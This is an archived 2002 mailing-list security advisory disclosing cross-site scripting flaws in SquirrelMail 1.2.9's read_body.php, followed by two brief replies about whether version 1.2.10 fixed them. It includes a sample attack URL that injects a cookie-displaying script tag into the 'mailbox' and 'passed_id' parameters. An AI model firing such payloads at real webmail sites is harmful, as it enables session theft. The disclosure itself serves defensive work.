SquirrelMail v1.2.9 XSS bugs From: "euronymous" <just-a-user@yandex.ru> To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org Date: Tue, 3 Dec 2002 07:28:14 +0300 (MSK) =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: SquirrelMail v1.2.9 XSS bugs product: SquirrelMail v1.2.9 vendor: www.squirrelmail.org risk: low date: 12/3/2k2 discovered by: euronymous /F0KP /HACKRU Team advisory url: http://f0kp.iplus.ru/bz/008.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- when reading some email you can to insert the scripting code.. read_body.php dont make filtering users input in `mailbox' and `passed_id' variables. btw, today has released v1.2.10. im dont know if this version contains this xss. sample attack ------------- http://hostname/src/read_body.php?mailbox= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E& startMessage=1&show_more=0 [it must be in a single string] not URL-encoded string working fine also. shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all russian security guyz!! fuck_off: slavomira and other dirty ppl in *.kz ================ im not a lame, not yet a hacker ================
hi! it's not in 1.2.10 yet (bug announced at 6.12 release at 2.12) [seen on squirrelmail.org] greetings, LordVAn
The news page says the fix was commited to CVS, but no new version was made after the 1.2.10 release to include the bug.
